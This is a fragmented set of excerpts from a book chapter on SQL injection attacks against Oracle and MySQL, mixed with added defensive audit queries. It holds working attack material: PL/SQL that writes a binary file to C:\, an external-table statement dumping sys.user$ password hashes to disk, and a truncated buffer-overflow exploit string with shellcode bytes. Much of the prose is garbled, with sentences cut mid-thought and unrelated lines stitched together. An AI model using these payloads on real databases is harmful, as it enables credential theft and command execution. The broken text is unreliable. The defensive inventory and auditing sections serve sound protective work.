UTL_FILE can write binary code to the file system.
300 Chapter 6 • Exploiting the Operating System
Figure 6.18 Compiling a Binary on SQL Server Using csc.exe
use csc.exe by running it out of the perfectly predictable DLL cache, %windir%\system32\dllcache\csc.exe.
■ External tables
■ Java
Create or replace directory EXT AS 'C:\';
DECLARE
  fi UTL_FILE.FILE_TYPE;
  bu RAW(32767);
BEGIN
  -- 100-byte DOS .com program that prints "Hello, World!" (hex as printed in the book, line-wrap spaces removed)
  bu := hextoraw('BF3B01BB8100021E8000B88200882780FB81750288D850E8060083C402CD20C35589E5B80100508D451A50B80F00508D5D00FFD383C40689EC5DC3558BEC8B5E088B4E048B5606B80040CD21730231C08BE55DC39048656C6C6F2C20576F726C64210D0A');
  fi := UTL_FILE.fopen('EXT', 'hello.com', 'w', 32767);
  UTL_FILE.put_raw(fi, bu, TRUE);
  UTL_FILE.fclose(fi);
END;
/
create directory EXT as 'C:\';
CREATE TABLE ext_write (myline)
  ORGANIZATION EXTERNAL
  (TYPE oracle_datapump
   DEFAULT DIRECTORY EXT
   LOCATION ('victim3.txt'))
  PARALLEL
AS
  SELECT 'I was here' from dual UNION SELECT name||'='||password from sys.user$;
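Both file-writing paths just shown (UTL_FILE through a directory object, and a CTAS external table with the oracle_datapump driver) depend on the same handful of privileges, so a DBA can inventory who is able to use them. The following data dictionary queries are an added defender's example and are not code from the book; they assume Oracle 10g or later, a session as SYS or a user with SELECT on the DBA_ views, and SQL*Plus as the client. The directory name EXT in the REVOKE statement is a placeholder taken from the examples above.

```sql
-- Added example (not from the book): find out who could write files to the server
-- through UTL_FILE or an external table. Run each statement separately in SQL*Plus.

-- 1. Directory objects and the OS paths they expose. A path such as C:\ or / means
--    that any grantee with WRITE on it can drop files into arbitrary locations.
SELECT owner, directory_name, directory_path
  FROM dba_directories
 ORDER BY directory_name;

-- 2. Who holds READ/WRITE/EXECUTE on those directory objects. Directory privileges
--    are recorded in DBA_TAB_PRIVS with the directory name as TABLE_NAME and OWNER = 'SYS'.
SELECT p.grantee, p.table_name AS directory_name, p.privilege, d.directory_path
  FROM dba_tab_privs p
  JOIN dba_directories d ON d.directory_name = p.table_name
 WHERE p.owner = 'SYS'
   AND p.privilege IN ('READ', 'WRITE', 'EXECUTE')
 ORDER BY p.grantee, p.table_name;

-- 3. Who can create directory objects at all ("create directory EXT as 'C:\'" above
--    needs CREATE ANY DIRECTORY) and who can execute UTL_FILE (PUBLIC by default).
SELECT grantee, privilege
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE ANY DIRECTORY', 'DROP ANY DIRECTORY')
UNION ALL
SELECT grantee, 'EXECUTE ON ' || table_name
  FROM dba_tab_privs
 WHERE owner = 'SYS' AND table_name = 'UTL_FILE' AND privilege = 'EXECUTE'
 ORDER BY 1, 2;

-- 4. Legacy UTL_FILE_DIR parameter (present up to 12c): a value of '*' lets UTL_FILE
--    open files anywhere without any directory object being involved.
SELECT name, value
  FROM v$parameter
 WHERE name = 'utl_file_dir';

-- 5. Remediation: keep directory objects off system paths, grant WRITE only where an
--    application needs it, and take UTL_FILE away from PUBLIC (then grant it to the
--    specific schemas that use it). Grantees below are placeholders.
REVOKE WRITE ON DIRECTORY ext FROM PUBLIC;
REVOKE EXECUTE ON sys.utl_file FROM PUBLIC;
```

Query 2 is the one to watch: a directory object rooted at the drive or filesystem root combined with WRITE for an application account is exactly the precondition the two examples above need, and neither requires DBA privileges once it is in place.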
You can find Java sample code on Marco Ivaldi’s Web page, at www.0xdeadbeef.info/
normally searched for because of the high level of privileges with which most database servers run. A remote exploit against Apache will, at best, result in a shell with a user ID
This section deals with executing operating system commands directly through SQL injection by exploiting functionality built into the RDBMS.
Depending on the Oracle version, the following methods are available. Oracle EXTPROC, Java, and DBMS_SCHEDULER are official methods from Oracle to run operating system
or CREATE EXTERNAL JOB (10g Rel. 2/11g) privileges. Since 10.2.0.2, the operating system commands are no longer executed as user Oracle, but as user nobody.
are executed as user Oracle. There are no special requirements, as there are with the Java and EXTPROC variations. The only requirement for PL/SQL native is the right to modify the
normally be executed only as user SYS. In this example, we create a text file called e2.sql which is executed by sqlplus. This sqlplus command is started via PL/SQL native.
In addition to the methods above, it can also be possible to execute operating system code using other functionality within the database, including the following:
Alter System Set Events
Alter system set is an undocumented parameter (since Oracle 10g) that allows you to specify
Since 9i Rel. 2, Oracle offers the possibility to convert PL/SQL code into C code. To increase the flexibility, Oracle allows you to change the name of the make utility (e.g., to calc.exe or
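Every operating system command path described in this section (DBMS_SCHEDULER external jobs, Java, EXTPROC libraries, ALTER SYSTEM for the "set events" and PL/SQL native variants) is gated by a system privilege or role and leaves a statement that can be audited. The following is an added example for defenders, not code from the book: an inventory of who holds those privileges, a check that the PL/SQL native compilation parameters have not been redirected, and an audit policy that records use of these paths. It assumes Oracle 12c or later with unified auditing available (the traditional AUDIT statements in step 4 cover 10g/11g), a session as SYS, and the policy name os_escape_pol is an assumption.

```sql
-- Added example (not from the book): inventory and auditing of the privileges behind the
-- OS command execution methods discussed above. Run as SYS in SQL*Plus.

-- 1. Who holds the prerequisites the text names: CREATE (ANY|EXTERNAL) JOB for
--    DBMS_SCHEDULER, CREATE (ANY) LIBRARY for EXTPROC, ALTER SYSTEM for the parameter
--    and "set events" variants, and the Java system roles.
SELECT grantee, privilege
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE JOB', 'CREATE ANY JOB', 'CREATE EXTERNAL JOB',
                     'CREATE LIBRARY', 'CREATE ANY LIBRARY', 'ALTER SYSTEM')
UNION ALL
SELECT grantee, 'ROLE ' || granted_role
  FROM dba_role_privs
 WHERE granted_role IN ('JAVASYSPRIV', 'JAVA_ADMIN', 'JAVADEBUGPRIV')
 ORDER BY 1, 2;

-- 2. PL/SQL native compilation settings. On 9i/10g these name the make utility and
--    library directory; any non-default value deserves a look.
SELECT name, value, isdefault
  FROM v$parameter
 WHERE name LIKE 'plsql_native%' OR name = 'plsql_code_type';

-- 3. Unified audit policy (12c+): record every use of these paths by every user.
--    EXECUTE ON a package is an auditable object action.
CREATE AUDIT POLICY os_escape_pol
  PRIVILEGES CREATE EXTERNAL JOB, CREATE ANY JOB, CREATE LIBRARY,
             CREATE ANY DIRECTORY, ALTER SYSTEM
  ACTIONS    EXECUTE ON sys.dbms_scheduler,
             EXECUTE ON sys.utl_file,
             CREATE LIBRARY, CREATE DIRECTORY;
AUDIT POLICY os_escape_pol;

-- 4. Pre-12c equivalent with traditional auditing (needs AUDIT_TRAIL=DB or DB,EXTENDED).
AUDIT EXECUTE ON sys.dbms_scheduler BY ACCESS;
AUDIT EXECUTE ON sys.utl_file BY ACCESS;
AUDIT CREATE EXTERNAL JOB, CREATE ANY DIRECTORY, CREATE LIBRARY, ALTER SYSTEM BY ACCESS;

-- 5. Review (unified audit): who triggered the policy and with which statement.
SELECT event_timestamp, dbusername, action_name, object_schema, object_name, sql_text
  FROM unified_audit_trail
 WHERE unified_audit_policies LIKE '%OS_ESCAPE_POL%'
 ORDER BY event_timestamp DESC;
```

The point of step 3 is that none of the methods in this section are silent: a CREATE EXTERNAL JOB call, a CREATE LIBRARY pointing at a non-Oracle shared object, or an ALTER SYSTEM that changes a plsql_native parameter from an application account is a high-fidelity alert, and the audit row carries the injected SQL text that caused it.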
In 2004, Cesar Cerrudo published an exploit for a buffer overflow in the Oracle functions NUMTOYMINTERVAL and NUMTODSINTERVAL (see http://seclists.org/vulnwatch/2004/q1/0030.html). By using the following exploit, it was possible to run operating system commands on the database server:
SELECT NUMTOYMINTERVAL (1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' ||chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)|| chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)|| chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo ARE YOU SURE?
MySQL
MySQL does not natively support the execution of shell commands. Most times the attacker hopes that the MySQL server and Web server reside on the same box, allowing him to use the “select into DUMPFILE” technique to build a rogue Common Gateway Interface (CGI) on the target machine. The “create UDF” attack detailed by NGS Software (www.ngssoftware.com/papers/HackproofingMySQL.pdf) is excellent thinking, but it’s not easy to do through an SQL injection attack (again because you cannot execute multiple queries separated by a command separator). Stacked queries are possible in MySQL 5 and later, but this has not been found in the wild very often (yet).
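Both MySQL techniques mentioned above have server-side preconditions that a DBA can check and remove: “select into DUMPFILE” needs the FILE privilege and a secure_file_priv setting that does not restrict the output path, and a “create UDF” attack needs a shared library in plugin_dir. The statements below are an added example, not code from the book or from the NGS Software paper; the account name 'webapp'@'localhost' and the path in the comment are assumptions.

```sql
-- Added example (not from the book): MySQL checks for the DUMPFILE and UDF preconditions.

-- 1. secure_file_priv controls where SELECT ... INTO OUTFILE/DUMPFILE and LOAD DATA may
--    read or write. An empty value means no restriction (what the DUMPFILE-to-webroot trick
--    relies on); a directory confines file I/O to that directory; NULL disables it entirely.
--    The variable is read-only at runtime and must be set under [mysqld] in my.cnf, for
--    example: secure_file_priv = /var/lib/mysql-files   (path is an assumption)
SHOW VARIABLES LIKE 'secure_file_priv';

-- 2. Accounts holding the global FILE privilege (and SUPER, which is needed to alter
--    server settings). Application accounts used by the Web tier should not appear here.
SELECT grantee, privilege_type
  FROM information_schema.user_privileges
 WHERE privilege_type IN ('FILE', 'SUPER')
 ORDER BY grantee;

-- 3. Registered UDFs. CREATE FUNCTION ... SONAME only loads libraries from plugin_dir,
--    so compare the dl column against the files you actually installed there.
SHOW VARIABLES LIKE 'plugin_dir';
SELECT name, ret, dl, type
  FROM mysql.func;

-- 4. Remediation for an over-privileged application account (name is an assumption).
REVOKE FILE ON *.* FROM 'webapp'@'localhost';
FLUSH PRIVILEGES;
```

Step 1 is the single most effective control: with secure_file_priv pointing at a directory outside the Web root, a FILE-privileged injection can still write there, but the written file is not reachable as a CGI or PHP page, which is the whole point of the DUMPFILE technique.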